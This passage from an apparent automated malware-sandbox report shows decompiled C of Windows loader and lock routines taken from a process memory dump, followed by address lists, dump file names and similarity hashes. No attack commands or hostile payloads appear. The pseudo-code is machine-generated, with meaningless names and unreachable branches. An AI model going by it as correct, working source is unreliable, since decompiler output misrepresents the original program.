							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3518608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03456B90(_t210,  &_v64);
										_t262 =  *0x3518608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0345E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E034697C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0346006A(0x3518608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3518608);
												E0346B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3516904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3516e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0343FFB0(_t198, _t240, 0x3518608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E034600C2(0x3518608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x034520a0
0x034520a8
0x034520ad
0x034520b3
0x034520b8
0x034520c2
0x034520c7
0x034520cb
0x034520d2
0x03452263
0x03452266
0x03495836
0x03495836
0x00000000
0x0345226c
0x0345226c
0x03452270
0x03452274
0x034520e2
0x034520e2
0x034520e6
0x034520ee
0x034957dc
0x034957de
0x034957ec
0x034957ec
0x034957f1
0x034957f3
0x034957f8
0x00000000
0x034957f8
0x034957e0
0x034957e4
0x034957ea
0x00000000
0x00000000
0x00000000
0x034957ea
0x034520f4
0x034520f4
0x034520f8
0x034520f8
0x034520fc
0x03452100
0x03452106
0x03452201
0x03452206
0x0345220b
0x0345220e
0x034522a9
0x034522ac
0x00000000
0x00000000
0x034522b2
0x034522b5
0x03495801
0x03495806
0x00000000
0x00000000
0x03495810
0x03495815
0x03495818
0x00000000
0x00000000
0x0349581e
0x034522bb
0x034522bb
0x03452218
0x03452218
0x0345221c
0x03452220
0x03452222
0x034522c2
0x034522c4
0x034522dc
0x034522dc
0x034522e1
0x00000000
0x00000000
0x00000000
0x034522e7
0x034522c8
0x034522cd
0x034522d3
0x034522d6
0x03495823
0x03495825
0x03495827
0x00000000
0x00000000
0x0349582d
0x00000000
0x0349582d
0x00000000
0x03452228
0x03452228
0x00000000
0x03452228
0x03452222
0x03452214
0x03452214
0x00000000
0x03452114
0x03452114
0x03452114
0x0345211a
0x0345211c
0x03452348
0x0345234d
0x03495840
0x03495845
0x03495848
0x0349584e
0x0349584e
0x03495848
0x03452353
0x03452355
0x03452388
0x03452388
0x03452368
0x0345236a
0x0345236c
0x0345238f
0x00000000
0x0345236e
0x0345236e
0x0345218e
0x0345218e
0x03452191
0x03452195
0x03495a03
0x03495a06
0x03495a0c
0x03495a0f
0x03495a11
0x03495a13
0x03495a13
0x03495a19
0x03495a1f
0x00000000
0x0345219b
0x0345219b
0x034521a0
0x03452282
0x03452284
0x03452284
0x03452284
0x03452284
0x034521a6
0x034521a9
0x034521ac
0x034521ae
0x034521b3
0x0345228b
0x03452290
0x03452379
0x03452296
0x03452298
0x03452298
0x03452290
0x034521b9
0x034521be
0x034522a2
0x034522a2
0x034521c4
0x034521c8
0x034521cc
0x034521d0
0x034521d4
0x034521de
0x034521e3
0x03495a29
0x03495a2c
0x00000000
0x00000000
0x03495a3b
0x00000000
0x034521e9
0x034521e9
0x034521e9
0x034521ee
0x034521f1
0x03495a45
0x03495a4b
0x03495a52
0x03495a58
0x03495a5d
0x03495a5f
0x03495a71
0x03495a61
0x03495a6a
0x03495a6a
0x03495a76
0x03495a79
0x03495a7f
0x03495a83
0x03495a85
0x03495a87
0x03495a87
0x03495a8c
0x03495a91
0x03495a97
0x03495a9f
0x03495aa0
0x03495aa1
0x03495aa6
0x03495aab
0x03495ab1
0x03495ab3
0x03495ab9
0x03495aca
0x03495ad4
0x03495ad4
0x03495ade
0x03495ade
0x03495aab
0x03495a79
0x03495a52
0x034521f7
0x034521f9
0x034521fe
0x034521fe
0x034521e3
0x03452195
0x0345236c
0x03452122
0x03452122
0x03452124
0x03452231
0x03452236
0x03452236
0x03452238
0x03452238
0x03452240
0x03452242
0x03452244
0x034959fc
0x0345218c
0x0345218c
0x00000000
0x0345218c
0x0345224a
0x0345224f
0x03452256
0x03452304
0x03452309
0x0345230f
0x0345231e
0x0345231e
0x0345231e
0x03452320
0x03452325
0x0345232a
0x0345232c
0x0345233e
0x0345233e
0x00000000
0x0345232c
0x03452311
0x03452317
0x0345231a
0x0345231c
0x03452380
0x03452380
0x03452380
0x03452384
0x00000000
0x00000000
0x03452386
0x00000000
0x0345231c
0x0345225c
0x0345225c
0x00000000
0x0345225c
0x0345212a
0x03452134
0x03452138
0x0345213d
0x03495858
0x03495863
0x03495863
0x03495867
0x0349586a
0x00000000
0x00000000
0x0349586c
0x0349586c
0x03495871
0x03495875
0x03495877
0x03495997
0x0349599c
0x034959a1
0x034959a7
0x034959a7
0x00000000
0x034959a7
0x0349587d
0x00000000
0x0349588b
0x0349588b
0x03495890
0x03495892
0x03495894
0x03495899
0x0349589b
0x034958a0
0x034958a0
0x034958aa
0x034958b2
0x034958b6
0x034958be
0x034958c6
0x034958c9
0x0349590d
0x03495917
0x0349591a
0x0349591c
0x03495920
0x03495928
0x0349592a
0x0349592c
0x0349592e
0x0349592e
0x034958cb
0x034958cd
0x034958d8
0x034958e0
0x034958f4
0x034958fe
0x034958fe
0x0349593a
0x0349593e
0x03495940
0x03495942
0x00000000
0x03495944
0x03495944
0x03495949
0x0349594e
0x0349594e
0x03495953
0x0349595b
0x03495976
0x03495976
0x0349597a
0x0349597f
0x00000000
0x00000000
0x00000000
0x00000000
0x03495981
0x03495981
0x03495981
0x03495983
0x03495988
0x0349598d
0x03495991
0x03495991
0x00000000
0x0349595d
0x0349595d
0x03495963
0x03495965
0x00000000
0x00000000
0x00000000
0x00000000
0x03495967
0x03495967
0x0349596b
0x0349596d
0x00000000
0x00000000
0x0349596f
0x03495971
0x03495971
0x03495974
0x00000000
0x00000000
0x00000000
0x03495974
0x00000000
0x03495967
0x0349595b
0x03495942
0x03495863
0x03452143
0x03452143
0x03452149
0x0345214f
0x034522f1
0x034522f6
0x00000000
0x03452173
0x03452173
0x0345217d
0x03452181
0x03452186
0x034959ae
0x034959b2
0x034959b5
0x034959b7
0x034959ba
0x034959cd
0x034959d1
0x034959d5
0x034959d9
0x034959db
0x00000000
0x00000000
0x034959dd
0x034959dd
0x034959e1
0x034959e4
0x034959e7
0x034959ee
0x034959ee
0x034959f3
0x034959f3
0x00000000
0x03452186
0x0345214f
0x03452106
0x03452266
0x034520d8
0x034520da
0x034520e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20388268f35e589214519a3855abd47e4a1665fe23142585307d1f67e3d0b63e
Instruction ID: 075c0cf5f91dc77dcf705e553518f5176f3f62fc3233cf52d94e274217b2efca
Opcode Fuzzy Hash: 20388268f35e589214519a3855abd47e4a1665fe23142585307d1f67e3d0b63e
Instruction Fuzzy Hash: F7F1D335A083059FEB26CB28C44072BBBE5AB85314F18899FFC959F351D774D841CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0343D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0343D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x351d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03436600(0x35152d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3517b9c; // 0x0
							_t281 = L03444620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0346F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3517b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x3517b8c; // 0xc034c8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0xc03578
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E03442280(_t200, 0x35184d8);
									_t277 =  *0x35185f4; // 0xc039b8
									_t351 =  *0x35185f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74770000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0xc03a00
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0xc03950
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0xc03a00
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0xc045c0
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0343FFB0(_t287, _t353, 0x35184d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0347CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03436600(0x35152d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03437926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x351b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E034AE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3518472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x351b218; // 0x0
														asm("ror edi, cl");
														 *0x351b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03442280(_t250, 0x35184d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03463898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0343FFB0(_t293, _t353, 0x35184d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E034637F5(_t353, 0);
																}
																E03460413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03459B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E034502D6(_t174);
																}
																L034477F0( *0x3517b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0345C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0343EC7F(_t353);
										L034519B8(_t287, 0, _t353, 0);
										_t200 = E0342F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0346B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x351b2f8; // 0xf70000
									if((_t206 |  *0x351b2fc) == 0 || ( *0x351b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x351b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E034D6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E034D6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0343E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0343EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03469730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0343E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03438F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03463C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0343d5f2
0x0343d5f5
0x0343d5f5
0x0343d5fd
0x0343d600
0x0343d60a
0x0343d60d
0x0343d617
0x0343d61d
0x0343d627
0x0343d62e
0x0343d911
0x0343d913
0x00000000
0x0343d919
0x0343d919
0x0343d919
0x0343d634
0x0343d634
0x0343d634
0x0343d634
0x0343d640
0x0343d8bf
0x00000000
0x0343d646
0x0343d646
0x0343d64d
0x0343d652
0x0348b2fc
0x0348b2fc
0x0348b302
0x0348b33b
0x0348b341
0x00000000
0x0348b304
0x0348b304
0x0348b319
0x0348b31e
0x0348b324
0x0348b326
0x0348b332
0x0348b347
0x0348b34c
0x0348b351
0x0348b35a
0x00000000
0x0348b328
0x0348b328
0x00000000
0x0348b328
0x0348b326
0x0343d658
0x0343d658
0x0343d65b
0x0343d665
0x00000000
0x0343d66b
0x0343d66b
0x0343d66b
0x0343d66b
0x0343d66d
0x0343d672
0x0343d67a
0x00000000
0x00000000
0x0343d680
0x0343d686
0x0343d8ce
0x0343d8d4
0x0343d8da
0x0343d8dd
0x0343d8dd
0x0343d8e0
0x0343d68c
0x0343d691
0x0343d69d
0x0343d6a2
0x0343d6a7
0x0343d6b0
0x0343d6b0
0x0343d6b5
0x0343d6e0
0x0343d6b7
0x0343d6b7
0x0343d6b9
0x0343d6b9
0x0343d6bb
0x0343d6bd
0x0343d6ce
0x0343d6d0
0x0343d6d2
0x0348b363
0x0348b365
0x00000000
0x0348b36b
0x00000000
0x0348b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0343d6bf
0x0343d6bf
0x0343d6e5
0x0343d6e7
0x0343d6e9
0x0343d6e9
0x0343d6ec
0x0343d6ec
0x0343d6ef
0x0343d6f5
0x0343d6f9
0x0343d6fb
0x0343d6fd
0x0343d701
0x0343d703
0x0343d70a
0x0343d70a
0x0343d70a
0x0343d701
0x0343d70d
0x0343d710
0x0343d710
0x0343d6c1
0x0343d6c1
0x0343d6c1
0x0343d6c6
0x0348b36d
0x0348b36f
0x00000000
0x0348b375
0x0348b375
0x0348b375
0x00000000
0x0348b375
0x00000000
0x0343d6cc
0x0343d6d8
0x0343d6d8
0x0343d6d8
0x00000000
0x0343d6c6
0x0343d6bf
0x00000000
0x0343d6da
0x0343d6da
0x0343d716
0x0343d71b
0x0343d720
0x0343d726
0x0343d726
0x0343d72d
0x00000000
0x0343d733
0x0343d739
0x0343d742
0x0343d750
0x0343d758
0x0343d764
0x0343d776
0x0343d77a
0x0343d783
0x0343d928
0x0343d92c
0x0343d93d
0x0343d944
0x0343d94f
0x0343d954
0x0343d956
0x0343d95f
0x0343d961
0x0343d973
0x0343d973
0x0343d956
0x0343d944
0x0343d92c
0x0343d78b
